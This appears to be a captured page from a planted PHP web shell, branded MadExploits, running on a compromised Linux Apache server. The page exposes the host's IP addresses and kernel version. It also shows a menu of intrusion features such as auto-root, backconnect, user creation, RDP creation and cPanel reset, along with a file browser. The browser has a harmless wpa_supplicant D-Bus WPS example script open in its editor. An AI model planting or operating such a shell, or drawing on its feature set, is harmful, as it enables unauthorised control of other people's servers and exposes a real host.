Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els11.x86_64 #1 SMP Sun Nov 3 09:06:59 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.139.239.157
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
wpa_supplicant-2.6 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
p2p
[ DIR ]
drwxr-xr-x
60_wpa_supplicant
267
B
-rwxr-xr-x
dbus-listen-preq.py
1.53
KB
-rw-r--r--
ieee8021x.conf
269
B
-rw-r--r--
openCryptoki.conf
1.12
KB
-rw-r--r--
p2p-action-udhcp.sh
1.68
KB
-rwxr-xr-x
p2p-action.sh
2.63
KB
-rwxr-xr-x
p2p-nfc.py
19.73
KB
-rw-r--r--
plaintext.conf
133
B
-rw-r--r--
udhcpd-p2p.conf
2.86
KB
-rw-r--r--
wep.conf
170
B
-rw-r--r--
wpa-psk-tkip.conf
181
B
-rw-r--r--
wpa2-eap-ccmp.conf
284
B
-rw-r--r--
wpas-dbus-new-getall.py
1.7
KB
-rw-r--r--
wpas-dbus-new-signals.py
5.93
KB
-rw-r--r--
wpas-dbus-new-wps.py
2.17
KB
-rw-r--r--
wpas-dbus-new.py
4.17
KB
-rw-r--r--
wpas-test.py
2.51
KB
-rw-r--r--
wps-ap-cli
1.15
KB
-rwxr-xr-x
wps-nfc.py
15.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wpas-dbus-new-wps.py
#!/usr/bin/python import dbus import sys, os import time import gobject from dbus.mainloop.glib import DBusGMainLoop WPAS_DBUS_SERVICE = "fi.w1.wpa_supplicant1" WPAS_DBUS_INTERFACE = "fi.w1.wpa_supplicant1" WPAS_DBUS_OPATH = "/fi/w1/wpa_supplicant1" WPAS_DBUS_INTERFACES_INTERFACE = "fi.w1.wpa_supplicant1.Interface" WPAS_DBUS_WPS_INTERFACE = "fi.w1.wpa_supplicant1.Interface.WPS" def propertiesChanged(properties): if properties.has_key("State"): print "PropertiesChanged: State: %s" % (properties["State"]) def scanDone(success): print "Scan done: success=%s" % success def bssAdded(bss, properties): print "BSS added: %s" % (bss) def bssRemoved(bss): print "BSS removed: %s" % (bss) def wpsEvent(name, args): print "WPS event: %s" % (name) print args def credentials(cred): print "WPS credentials: %s" % (cred) def main(): dbus.mainloop.glib.DBusGMainLoop(set_as_default=True) global bus bus = dbus.SystemBus() wpas_obj = bus.get_object(WPAS_DBUS_SERVICE, WPAS_DBUS_OPATH) if len(sys.argv) != 2: print "Missing ifname argument" os._exit(1) wpas = dbus.Interface(wpas_obj, WPAS_DBUS_INTERFACE) bus.add_signal_receiver(scanDone, dbus_interface=WPAS_DBUS_INTERFACES_INTERFACE, signal_name="ScanDone") bus.add_signal_receiver(bssAdded, dbus_interface=WPAS_DBUS_INTERFACES_INTERFACE, signal_name="BSSAdded") bus.add_signal_receiver(bssRemoved, dbus_interface=WPAS_DBUS_INTERFACES_INTERFACE, signal_name="BSSRemoved") bus.add_signal_receiver(propertiesChanged, dbus_interface=WPAS_DBUS_INTERFACES_INTERFACE, signal_name="PropertiesChanged") bus.add_signal_receiver(wpsEvent, dbus_interface=WPAS_DBUS_WPS_INTERFACE, signal_name="Event") bus.add_signal_receiver(credentials, dbus_interface=WPAS_DBUS_WPS_INTERFACE, signal_name="Credentials") ifname = sys.argv[1] path = wpas.GetInterface(ifname) if_obj = bus.get_object(WPAS_DBUS_SERVICE, path) if_obj.Set(WPAS_DBUS_WPS_INTERFACE, 'ProcessCredentials', dbus.Boolean(1), dbus_interface=dbus.PROPERTIES_IFACE) wps = dbus.Interface(if_obj, WPAS_DBUS_WPS_INTERFACE) wps.Start({'Role': 'enrollee', 'Type': 'pbc'}) gobject.MainLoop().run() if __name__ == "__main__": main()
Close